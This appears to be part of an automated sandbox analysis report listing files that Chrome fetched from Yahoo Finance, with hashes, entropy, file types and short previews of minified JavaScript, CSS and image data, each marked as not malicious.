                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-e22f7dc6.806302f5a3de4c3c7cb5.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[9326],{1668:(e,t,n)=>{var a=n(4603);var i,r;i="undefined"!=typeof window?window:n.g,(r=void 0!==a.mE?a.mE:i.CIQ).EaseMachine=function(e,t,n,a){this.fc="string"==typeof e?r.EaseMachine[e]:e,this.ms=t,(n||0===n)&&this.reset(n,a)},r.EaseMachine.prototype.reset=function(e,t){for(var n in e||0===e||(e=this.currentValues),this.hasCompleted=!1,this.running=!1,this.okayToRun=!0,this.useNameValuePairs="object"==typeof t,this.startTime=Date.now(),this.useNameValuePairs?(this.startValues=e,this.endValues=t):(this.startValues={default:e},this.endValues={default:t}),this.changeValues={},this.currentValues={},this.startValues)this.changeValues[n]=this.endValues[n]-this.startValues[n]},r.EaseMachine.prototype.next=function(){var e=Date.now();for(var t in e>=this.startTime+this.ms&&(e=this.startTime+this.ms,t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3619)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.320465094507183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:HlXHmzd99EXLTvQMklrqIP27b0/r2UzJU2GZMLtilAzlvj:pSS3yFq/Cr2q5L0iJj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4CF1929C2E92CEA2F92E739CAB4D5B8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EE1FE60952E6FBC4DEADEF4D24770BE32D6D01E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:570B957C5C1FF7271F7D4D2ADAC5262736E3A6193D128C185D57EA4E35D7C5A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D581DCACA8D14AE1FB37F8CEDA26B95F95A8EF21448F54759432C79F74EE081B64B1EB42BE978DE1AAAAE9FC41397B54D492AEC8A4B80F76C8453F3BABD87BDE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-47fdab56.72496606dc8a36c24e8b.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-47fdab56.72496606dc8a36c24e8b.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[8560],{1598:(e,t,i)=>{i.r(t);var a=i(4603);i(1414);var r,s;r="undefined"!=typeof window?window:i.g,(s=void 0!==a.mE?a.mE:r.CIQ).Studies?(s.Studies.calculateTypicalPrice=function(e,t){var i=t.chart.scrubbed,a=t.days;if(i.length<a+1)t.overlay||(t.error=!0);else{var r=t.name;for(var s in t.outputs)r=s+" "+r;var n="hlc/3";"Med Price"==t.type?n="hl/2":"Weighted Close"==t.type&&(n="hlcc/4");var l=0;t.startFrom<=a&&(t.startFrom=0);for(var o=t.startFrom;o<i.length;o++)o&&i[o-1][r]&&(l=i[o-1][r]*a),l+=i[o][n],o>=a&&(l-=i[o-a][n],i[o][r]=l/a)}},s.Studies.studyLibrary=s.extend(s.Studies.studyLibrary,{"Med Price":{name:"Median Price",calculateFN:s.Studies.calculateTypicalPrice,inputs:{Period:14}}})):console.error("medianPrice feature requires first activating studies feature.")},5748:(e,t,i)=>{i.r(t);var
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5671)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.070083298506389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:wraJ3vPWv+1rvlTxydx1vDtvavk3KqACvKvZv35govR9vi5YZ2gxd/kKXcjt2JPN://+/Aao/Z2gH8BlfibrxnlCYtbQooz+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:529C6857BC7367A7B02D1CAB0FC124A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:62F8AD94D59FB37654FEC09D7F3D71F924045347
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CAF7ED66ABD5C153628BA877D305696D4EC00CA4A6E532CD2EE068849023FEA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B6272CB4F99C50A9ADE2AC8CC6AD28179C1B08CEB989DAB4BAA20EBB6EFE50C53F208876BB3FFF62BFD9153702469FA615163DCB7569B67037CC09B3F791013F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/FilteredStories.C5ltb4Tz.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.feedback-menu.yf-1aplcbz{min-width:190px;padding:var(--space-4) 1.5rem;border:1px solid var(--separator);border-radius:var(--border-radius-m);background-color:var(--surface4)}.feedback-item.yf-1aplcbz{display:flex;align-items:center;gap:var(--space-2);padding:var(--space-2) 0}.feedback-item.yf-1aplcbz button{font-weight:var(--font-m);padding:0}.feedback-options.yf-1grrhhv.yf-1grrhhv{padding:var(--space-4);background-color:var(--surface3);border-radius:var(--border-radius-m)}.feedback-header.yf-1grrhhv.yf-1grrhhv{font-weight:var(--font-bold);margin-bottom:var(--space-4);display:flex;align-items:center;justify-content:space-between}.options.yf-1grrhhv.yf-1grrhhv{display:grid;grid-template-columns:1fr;gap:var(--space-3);margin-bottom:var(--space-4)}.options.yf-1grrhhv label.yf-1grrhhv{display:flex;align-items:center;cursor:pointer}.options.yf-1grrhhv label.yf-1grrhhv:hover{color:var(--link-active)}input[type=radio].yf-1grrhhv.yf-1grrhhv{-webkit-appearance:none;-moz-appearance:none;appear
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (25060)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):25155
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.406118883490526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:/qB2kZ1/1o4O3C5DRhsqf0VsgBQ710oGE5T3NT3G4+CKT3yT3TtVcGZ+Wh7Rx/:iEuV/0o7VpmKv1/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2DCE0F5842DB674716C3913FF26286D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:90FA46FDC9D37BD292C68B3E64A62BD34964B8DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09130AA0256F36832E73047E44AB097DC786A11FDD3F8E47B9E3B81384AB70BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F8D35443FE4C7C484129D06332CF5870A6286F7A6CD0A3278E8273780312FFC489887BCF455462735FE5CA69469AA346DCD4671ADAC1AD9128EB47D790F679E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/vendors-d5c1e108.4ca627e7d7b910db51e3.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see vendors-d5c1e108.4ca627e7d7b910db51e3.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[8530],{8287:(t,e,r)=>{const n=r(7526),i=r(3961),o="function"==typeof Symbol&&"function"==typeof Symbol.for?Symbol.for("nodejs.util.inspect.custom"):null;e.hp=u,e.IS=50;const f=2147483647;function s(t){if(t>f)throw new RangeError('The value "'+t+'" is invalid for option "size"');const e=new Uint8Array(t);return Object.setPrototypeOf(e,u.prototype),e}function u(t,e,r){if("number"==typeof t){if("string"==typeof e)throw new TypeError('The "string" argument must be of type string. Received type number');return a(t)}return h(t,e,r)}function h(t,e,r){if("string"==typeof t)return function(t,e){"string"==typeof e&&""!==e||(e="utf8");if(!u.isEncoding(e))throw new TypeError("Unknown encoding: "+e);const r=0|g(t,e);let n=s(r);const i=n.write(t,e);i!==r&&(n=n.slice(0,i));return n}(t,e);if(ArrayBuffer.isVi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3666), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.122712688435668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:3hqjg8q1Mrsq1YrAw1Ld6UeCiyhq2WeptkcIL:3aumsu6AaLTc2en
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9FBA2531FFA6CB0B4D3D34C56C295495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC8BCC9D8F8360CB279D78F88BBEE001AB95D30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C6D2343A147111E4F3881E468FACC72DA4582C6AAEFF475D3371DF3FA2576BEE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BB6DC985ED5E343DB802BF07F7AF4A92BCB6788AA1F4ACBF61BB49DCFB2926C1E6CF6B1BC31544CBB98BD22D3688D2B220992CD9BED1F2E4FB43ADE8AE33F78E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-bind",[],t):"object"==typeof exports?exports["wafer-bind"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-bind"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18054
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.962896667434424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:hfkKZkIQ/bCXGeGBS7+gqul+GknJ7fV/yTrYOnp/qf/tguatJWyF:Lx2CXGK+gennJrV/Krnp/qf/tgRF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:12E776470475E5A5551642918CB234BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8738EDD4BF181D2086DD62FEC50D218BB1477799
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D4042A04476652E2E19D172FA5472372A81709225E08E2072E0DECBDEBCBC006
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B9E58D36A1EA6DF068DECB3A8336AE8B0BD201C48AD5863832826F8CD295305170A127F382C8DA312A07D37F9CF25D1700E35307E0384DD3C4F014A7CF4C9109
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/NHD3rrn1.wLWnNRxMGteMQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/insider_articles_922/ba89a0be2fcc3c8cd4db6f4cee05297e.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF~F..WEBPVP8X.... .........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 LD..0j...*....>y6.G..'..S.iP..M.y.[t:. .q..@.r...q}.......o.?..............}......k....q...........t.G.U._..../.+.....?..!...u.z.yw{E.^.....G..R.d..._.._..T.w...H...%...g...6G...Mc.>..l...~.HC.7K."w.9xH9..K}.>.S]mC...g.K.....2n.T>....w..Zt.,P.j$.^...7.........(5r....B..O......@..=....pur.?....y...?.............L.8..z+E.GwX+[.(..<...`....7|#........}|D.a.4=p.y...9...U`b..@..T...W:...D.0^K..l.......X.$/.hT..6.mB..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 41 x 330, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2986
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.595859761626018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:ki3VLqI5DRFJEmlXv+2KpDRFZdtseQURsd1dA1h6wBxANNh4E6LEZU3KgCDj2fbT:7LFDXlXWzzsZj/dEBxab46SKgC+jCMNn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C2396079060A7028FA898A73B72AA592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:81EE85D797FF9C40A19B15E4130D7F677011C5A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1A166EBD6C8872D71EFCEFB4765DB513014B732E1886525C5F2D5DED87071451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AC8F6403C6F5CD0ACEB315C0EE48DA6A3540D4C012A15A754EFEFE069CB33B6AA3124C3C5C7746185CE4A3EED7898A1AE07C170501AC78CAC16290084255CCA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/pv/static/img/voiceSearch1x-1620383531565.min.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...)...J............jPLTE...IIY..........#)E..\el.")...\dk!w..j.....j..j.'/;.:.....;.....i.....i....#+1$,4.j..............i.$+3....;..:.#*2.i..;.#+2.;.....j.....j..j..m..i........l..:....#+2#+1\dj.#).j..k..k.#(/.l.&-5.;..n..n....**7....j..:.....j.....;.....k..l.#*2.i..:.#*1.:..i..i........i........;........;.$+1....=...."%,#,5.j..i........j.....j.....j.....j...........n....#+1[dj.").:.$+1....:.$*2.:..j.......#+2.......j..;.$*2.j.....k..;....$+3.l...._fk`gn...ddm$$..A....[mm.l..i.....j....\cj................j..k..l..k..l..j.$*2.j..:.....j.#+2.;.#+1...$+1.;..k..j..:.#+4.;.$+2.i..<.%.3.=..@........j.....l.....i..C..w..i.....:.#*1[cj."(....Z.N....tRNS....*.........x.........@/....j./...eW'...V#"......}}lbR/+'#...........w8&...........ji^QPJ($$............N;/..................{xtqpoaZN?0%!............|dZZI<2!.........~{tng`^KGB972...ePG33....k....(IDATh...W.0....).Q..O.pC.......((....,...{...{o.V..Lz'......D}~..%m?$M..{m....u...=W.d.u8.....3**(....bT@.b..x...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (26835)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):26836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.095938360060026
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:Jbf6pzro5Y3M50t6KVQUpBxNEZNunjsNc6RwbGZZWh5:Zf6pzro5Yc5nIQUpBxNEZNsoc6RBM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9874B2AA662314BD56049D3AE51A6326
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:59BD935D13C34A1480599FF878D3C1963B8C992E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2BE772A9FCC91719E28C4B1D12420FE8B1544B24B3FDC61767F31B06847B062E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8ED6FB888CEF764F45CA9BE0363D0EB1584BE824F569087E939AD364C75864C928B5E57B148C350DA117B8B2AC268D17FC647E28F5DD6051255B5C0B845A8DA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Dock.BKyC7edm.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.title.yf-1l821ic.yf-1l821ic,.upscaled-title.yf-1l821ic.yf-1l821ic{font-size:var(--font-m);font-weight:var(--font-bold);text-transform:uppercase;width:100%}.title-text.yf-1l821ic.yf-1l821ic{flex-grow:1;font-weight:var(--font-bold)}.container.yf-1l821ic.yf-1l821ic{padding:0;border:0;padding-top:var(--space-4);background-color:var(--surface1);box-shadow:0 1px 2px #0000004d;border-radius:var(--border-radius-m)}.container.clip.yf-1l821ic.yf-1l821ic{text-overflow:clip}header.yf-1l821ic.yf-1l821ic{padding:0 .75rem .6rem}header.yf-1l821ic .title.yf-1l821ic{width:100%}@media only screen and (width >= 768px){.container.yf-1l821ic.yf-1l821ic{padding:.375rem 0}header.yf-1l821ic.yf-1l821ic{padding:0 var(--space-3) var(--space-1)}.no-pb.yf-1l821ic.yf-1l821ic{padding-bottom:0}}@media only screen and (max-width: 767px),(min-width: 1535px){header.hide-upscaled.yf-1l821ic.yf-1l821ic{display:none}.upscaled-title.yf-1l821ic span.title.yf-1l821ic,.upscaled-title.yf-1l821ic span.title-text.yf-1l821ic{font-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.756205690327326
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:nHNwl4csR/VTOYg3fWRCU6w3CBRVkJw/8NsR/V9qVk2GeY3XXsv:nHNKuPOIRC9yCRVkJ6cs4Vk2GeYe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:18E5B3AED31457B93EEDDDCA0018956D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CABC98CD14DCA74FA5FE5CC8C0435FF96BFAA061
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AC32CA046D461FBF30FCD68B4962322FDD6151F7BCBEF68E9901C01608278C44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3DD5F1E1C0F3948FDB26D1D13CA29457786312E13AB687E7982DFA06D7FAA83BD4E3FE321AFFAF7E856F6715AD09894D268EDA2AF2CF281C42F2E1E9FBD99B9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/LeafNewsStream.D-zPoQeW.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.news-stream.yf-17l7f4i{grid-column:1/span 8;text-align:left;min-height:20rem;height:-moz-fit-content;height:fit-content;max-width:750px}.full-width.yf-17l7f4i{max-width:initial}.holder.yf-17l7f4i{min-height:20rem;display:flex;align-items:center;justify-content:center;flex-direction:column}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (30142), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):30142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.262622575589199
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:oB+Pgmf4f4fkSpKYTwHhrZNqFQEVwWI6vLEts6XfEQxZyafRVfaPp:TPD4Af9tTwHDNqLLGsQrt4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D133CBEA9C1D56D1CBE4CB6E77F0EBF6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9474B4E8F5149B1124468C4590E850F7BBF141F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5E1E920D663D0BC1E363EC56C7FCCDEDD061F95FA60158C3AF425DAA952027CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:29A9268266585F047F69B565CDF5B1199A6D729A452513A0D534C0FA0B5886D46B7F9EDCB5948340DF45B1C4E9C942E61C53FEF102A7DBEBFF1C2191263C791B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-video"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(i[a])return i[a].exports;var n=i[a]={i:a,l:!1,exports:{}};return e[a].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i={};return t.m=e,t.c=i,t.d=function(e,i,a){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var i=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,i){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2088)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2089
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0197381984490645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:j1CKjEFkm7L9Hu5x80V35BWx7rZdnhqk9aUTvesuX+6UvrRyV1WF57TUEU3/3arj:JjoHA/w1dIkdiJtA4iP/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:841D0130C2CA45F84A74E36C91A06AAB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:311D1A7026F090201983D42BD4D6AEDCDB584F65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:19DC7FF3BE6002BF26816B2C39656CFF114ECBD5617D904371BA3E9DB3718D28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8059D7A3894A1DEE12315BC593989C56871873E2DF526F25C50F5AC44148E3B82411DE9A195226DC742CFBAC1B13027AD9B8E63FB0B2F25F2204DDE7C1F7045C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/FeatureBarNeo.CGHKwr-8.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.paddedQSP.yf-1a92qi.yf-1a92qi{margin:var(--space-4) var(--space-4) 0}.gridLayout .no-p-b.yf-1a92qi.yf-1a92qi{border-bottom:unset;padding-bottom:unset}.fb-wrapper.yf-1a92qi.yf-1a92qi{margin-top:var(--space-3)}.fb-wrapper.paddingBottom.yf-1a92qi.yf-1a92qi{padding-bottom:var(--space-4)}.fb-contents.yf-1a92qi.yf-1a92qi{display:flex;width:100%;background-color:var(--surface4);border-radius:var(--border-radius-s)}.label.yf-1a92qi.yf-1a92qi{background-color:var(--ui-brand);font-size:var(--font-m);font-weight:var(--font-bold);color:var(--text-inverse);align-items:center;border-radius:var(--border-radius-s);display:flex;width:-moz-fit-content;width:fit-content;padding:.625rem var(--space-2)}.label.redLabel.yf-1a92qi.yf-1a92qi{background-color:var(--negative)}.label.nuetralLabel.yf-1a92qi.yf-1a92qi{color:var(--white);background-color:var(--neutral)}.dynamicInsights.yf-1a92qi .label.yf-1a92qi{padding:.391rem var(--space-2);text-align:center}.title-wrapper.yf-1a92qi.yf-1a92qi{display:flex;justify
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8648)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.432518789876247
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:qXB+zrZvRaQ14TeVpNSmdHpcD9smLEore4AFcG3IujqyPhM1RJyKX7Lo:q8vZvRzN37dHeE4ejcG3G1Rlw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C8F33812DB820E0730783D062294D25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:66780164375BA9B7FE361261BE2A0B85384C32D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0707FB623C71E1E054B8B389C62BF58636955858BB034E119048EF1E905622C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DBE4016443DA8C7585FD36004D8D5B86F38A27D51077E419B54BB9B580A5F6C46D233901FAA116E764BC37B4DE964430646E31D3070EA443245518A6D3A38240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
